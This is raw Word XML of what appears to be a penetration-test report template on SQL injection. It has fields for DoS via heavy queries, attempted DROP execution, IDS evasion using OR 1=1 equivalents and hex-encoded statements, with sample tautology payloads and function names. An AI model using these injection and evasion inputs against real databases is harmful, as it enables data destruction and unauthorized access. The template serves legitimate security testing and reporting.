          <w:trHeight w:val="422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C1641DF" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00D90B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84DF9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CE9CE39" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00084DF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84DF9" w:rsidRPr="00084DF9" w14:paraId="24C7FD00" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:trPr>
          <w:trHeight w:val="422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CCA73B0" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00D90B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84DF9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DC4DFBC" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00084DF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84DF9" w:rsidRPr="00084DF9" w14:paraId="48825A48" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:trPr>
          <w:trHeight w:val="422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741AA57" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00D90B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84DF9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands/Queries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D308E12" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="132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AC7006F" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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F688F7E" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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955C7A4" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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AD8A397" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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408967F" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00084DF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E69D2" w:rsidRPr="00084DF9" w14:paraId="2417776E" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:trPr>
          <w:trHeight w:val="422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2F3E5E3" w14:textId="7C6C0FFA" w:rsidR="00AE69D2" w:rsidRPr="00084DF9" w:rsidRDefault="00AE69D2" w:rsidP="00D90B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E69D2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SQL Injection Payloads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93B853F" w14:textId="77777777" w:rsidR="00AE69D2" w:rsidRPr="00AE69D2" w:rsidRDefault="00AE69D2" w:rsidP="00AE69D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AE69D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[*SLEEP, WAITFOR DELAY, UNION, LIKE, COMPRESS, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EED4BF1" w14:textId="77777777" w:rsidR="00AE69D2" w:rsidRDefault="00AE69D2" w:rsidP="00AE69D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933C612" w14:textId="77777777" w:rsidR="00AE69D2" w:rsidRDefault="00AE69D2" w:rsidP="00AE69D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1C6D648" w14:textId="649D6100" w:rsidR="00AE69D2" w:rsidRPr="00084DF9" w:rsidRDefault="00AE69D2" w:rsidP="00AE69D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84DF9" w:rsidRPr="00084DF9" w14:paraId="3BE24FC2" w14:textId="77777777" w:rsidTr="00D90B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BCE5552" w14:textId="420A3D34" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00D90B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84DF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Performed Denial-of-Service Attack Successfull</w:t>
            </w:r>
            <w:r w:rsidR="002462C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y?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="356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5AC0A79" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00084DF9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084DF9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44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41A9C12" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00084DF9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084DF9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00084DF9" w:rsidRPr="00084DF9" w14:paraId="4FD8CB23" w14:textId="77777777" w:rsidTr="00D90B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41A8AA2" w14:textId="2FAD80A7" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00D90B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84DF9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Techniques</w:t>
            </w:r>
            <w:r w:rsidR="002462CE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>/ Approach</w:t>
            </w:r>
            <w:r w:rsidRPr="00084DF9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Used for Performing DoS Attack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9455BCB" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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4DF46CD" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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4ABE7F5" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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1EE98C5" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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9676D4C" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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754FA" w:rsidRPr="00084DF9" w14:paraId="3360F031" w14:textId="77777777" w:rsidTr="00D90B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2070888" w14:textId="05A96733" w:rsidR="00D754FA" w:rsidRPr="00084DF9" w:rsidRDefault="00D754FA" w:rsidP="00D90B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754FA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Execution Time Delay Observed?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B11C217" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRPr="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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D754F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[*Yes/No, Time in Seconds]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C4CDA75" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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2DF1622" w14:textId="06746738" w:rsidR="00D754FA" w:rsidRPr="00084DF9" w:rsidRDefault="00D754FA" w:rsidP="00D754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754FA" w:rsidRPr="00084DF9" w14:paraId="3CDB139A" w14:textId="77777777" w:rsidTr="00D90B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9C98AC4" w14:textId="21F8783F" w:rsidR="00D754FA" w:rsidRPr="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D90B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754FA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Database Overloaded?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A8BA45E" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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D754F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Effects on Performance/Availability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2F32735" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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0252591" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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3DD538C" w14:textId="0F277968" w:rsidR="00D754FA" w:rsidRPr="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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754FA" w:rsidRPr="00084DF9" w14:paraId="4540F192" w14:textId="77777777" w:rsidTr="00D90B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795F2D4" w14:textId="43748D54" w:rsidR="00D754FA" w:rsidRPr="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D90B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754FA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Wildcard Characters Used for Query Expansion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8B48CCA" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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D754F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%, [], [^], _,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86009E2" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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F030DDF" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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E91AA59" w14:textId="308E72D0" w:rsidR="002B7FCA" w:rsidRDefault="002B7FCA" w:rsidP="00D754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754FA" w:rsidRPr="00084DF9" w14:paraId="559758E9" w14:textId="77777777" w:rsidTr="00D90B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50648D2" w14:textId="0B9F2F38" w:rsidR="00D754FA" w:rsidRPr="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D90B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754FA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Attempted DROP Query Execution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C14BC57" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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D754F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Success/Failure, Impact if successful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0A31104" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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D24532A" w14:textId="2B2BFFC9" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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754FA" w:rsidRPr="00084DF9" w14:paraId="70A9B6A2" w14:textId="77777777" w:rsidTr="00D90B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4E461A6" w14:textId="47694FFA" w:rsidR="00D754FA" w:rsidRPr="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D90B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754FA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Database Resiliency Observed?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F9E5E5C" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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D754F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Response to Heavy Queries and DROP Commands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9DED391" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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09516FF" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754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882E577" w14:textId="04D2723C" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D754F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462CE" w:rsidRPr="00084DF9" w14:paraId="0A612548" w14:textId="77777777" w:rsidTr="00D90B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F04A1ED" w14:textId="14013BAE" w:rsidR="002462CE" w:rsidRPr="00084DF9" w:rsidRDefault="002462CE" w:rsidP="00D90B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Evidence Collected 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A60E6D4" w14:textId="77777777" w:rsidR="002462CE" w:rsidRPr="002462CE" w:rsidRDefault="002462CE" w:rsidP="002462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462C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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4520EF11" w14:textId="77777777" w:rsidR="002462CE" w:rsidRDefault="002462CE" w:rsidP="002462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E915D3A" w14:textId="77777777" w:rsidR="002462CE" w:rsidRDefault="002462CE" w:rsidP="002462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FC4C25D" w14:textId="14EE2DA7" w:rsidR="002462CE" w:rsidRPr="00084DF9" w:rsidRDefault="002462CE" w:rsidP="002462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754FA" w:rsidRPr="00084DF9" w14:paraId="3C6CD66A" w14:textId="77777777" w:rsidTr="00D90B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5ACC13C" w14:textId="3D4DF4B1" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="00D90B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 xml:space="preserve">Remediation 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A213FF7" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="002462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BACCECA" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="002462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3D4FE16" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRDefault="00D754FA" w:rsidP="002462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F7DE953" w14:textId="77777777" w:rsidR="00D754FA" w:rsidRPr="002462CE" w:rsidRDefault="00D754FA" w:rsidP="002462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084DF9" w:rsidRPr="00084DF9" w14:paraId="3A567EAB" w14:textId="77777777" w:rsidTr="00D90B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AF5D5FB" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00D90B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84DF9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41ED6F9" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="133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E29F1AA" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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A28CD1D" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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A51C0E1" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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D614E6E" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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90AB1DE" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRPr="00084DF9" w:rsidRDefault="00084DF9" w:rsidP="00084DF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6F89DC60" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="005D2C80" w:rsidRDefault="00A77261" w:rsidP="00A77261">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b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77261" w:rsidRPr="005D2C80" w14:paraId="36754681" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16D8312F" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="005D2C80" w:rsidRDefault="00A77261" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7EE39789" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="005D2C80" w:rsidRDefault="00A77261" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7C395D33" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="005D2C80" w:rsidRDefault="00A77261" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FB9663D" w14:textId="77777777" w:rsidR="00A77261" w:rsidRDefault="00A77261" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A9562E8" w14:textId="77777777" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60766877" w14:textId="77777777" w:rsidR="00D90BD6" w:rsidRPr="005D2C80" w:rsidRDefault="00D90BD6" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4693FD9D" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="005D2C80" w:rsidRDefault="00A77261" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ACEAACD" w14:textId="77777777" w:rsidR="00084DF9" w:rsidRDefault="00084DF9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A77261" w:rsidRPr="00A51A96" w14:paraId="418EFD02" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7EB003CE" w14:textId="1264C331" w:rsidR="00A77261" w:rsidRPr="003C713F" w:rsidRDefault="00A77261" w:rsidP="00972D9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7.10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A77261">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Evade IDS Detection using 'OR 1=1 Equivalents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DD9FEF4" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00D90BD6" w:rsidRDefault="00A77261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A77261" w:rsidRPr="00A77261" w14:paraId="24B869FE" w14:textId="77777777" w:rsidTr="00D90B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B50E465" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00D90B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77261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956DF11" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00A772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77261" w:rsidRPr="00A77261" w14:paraId="08FE7B51" w14:textId="77777777" w:rsidTr="00D90B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1C6EE71" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00D90B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77261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7B65598" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00A772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77261" w:rsidRPr="00A77261" w14:paraId="164A4BA6" w14:textId="77777777" w:rsidTr="00D90B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5CD96C3" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00D90B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77261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B1D837D" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00A772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77261" w:rsidRPr="00A77261" w14:paraId="0A52B5F8" w14:textId="77777777" w:rsidTr="00D90B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B44CEBC" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00D90B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77261">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands/Queries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9BBDB4F" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="137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6D95DD0" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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BF0AE8F" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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B656E0E" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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D3BDB37" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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C559570" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00A772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77261" w:rsidRPr="00A77261" w14:paraId="5A522AEB" w14:textId="77777777" w:rsidTr="00D90B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21B9B20" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00D90B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77261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 xml:space="preserve">Hex Equivalent </w:t>
            </w:r>
            <w:r w:rsidRPr="00A77261">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>of SQL injection Statements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81ADEAA" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="138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9DCD089" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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738FB21" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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006CEEC" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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03CF47A" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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D7B9D67" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00A772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77261" w:rsidRPr="00A77261" w14:paraId="7E0857DB" w14:textId="77777777" w:rsidTr="00D90B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D45638C" w14:textId="05D8F5D6" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00D90B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A77261">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Evaded IDS Successfully</w:t>
            </w:r>
            <w:r w:rsidR="00281162">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>?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0A08B419" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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A77261">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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0AF1EC71" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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A77261">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281162" w:rsidRPr="00A77261" w14:paraId="3A4DD98D" w14:textId="77777777" w:rsidTr="00D90B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E04B5D7" w14:textId="46E124C3" w:rsidR="00281162" w:rsidRPr="00A77261" w:rsidRDefault="00281162" w:rsidP="00D90B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81162">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>IDS/IPS Protection in Place?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15C0F4AA" w14:textId="4C562ABC" w:rsidR="00281162" w:rsidRPr="00A77261" w:rsidRDefault="00281162" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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kern w:val="0"/>
                <w:szCs w:val="24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2676E577" w14:textId="740D26CC" w:rsidR="00281162" w:rsidRPr="00A77261" w:rsidRDefault="00281162" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77261" w:rsidRPr="00A77261" w14:paraId="3FED55F7" w14:textId="77777777" w:rsidTr="00D90B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11F5E3A" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00D90B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77261">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Is IDS Able to Detect the SQL Injection Signatures?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4B6E9FAD" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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A77261">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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6DF08A0F" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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A77261">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77261" w:rsidRPr="00A77261" w14:paraId="4685261F" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:trPr>
          <w:trHeight w:val="971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F07A998" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00D90B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77261">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Response Received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401DCEC" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00A772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81162" w:rsidRPr="00A77261" w14:paraId="48807A28" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:trPr>
          <w:trHeight w:val="944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FFC85BE" w14:textId="508D6F67" w:rsidR="00281162" w:rsidRPr="00A77261" w:rsidRDefault="00281162" w:rsidP="00D90B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81162">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SQL Injection Variants Tested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291E10D" w14:textId="77777777" w:rsidR="00281162" w:rsidRDefault="00281162" w:rsidP="00A772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8116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[*e.g., OR 1=1, OR 'john'='john', OR 7&gt;1, OR 'movies'=N'movies', etc.]</w:t>
            </w:r>
          </w:p>
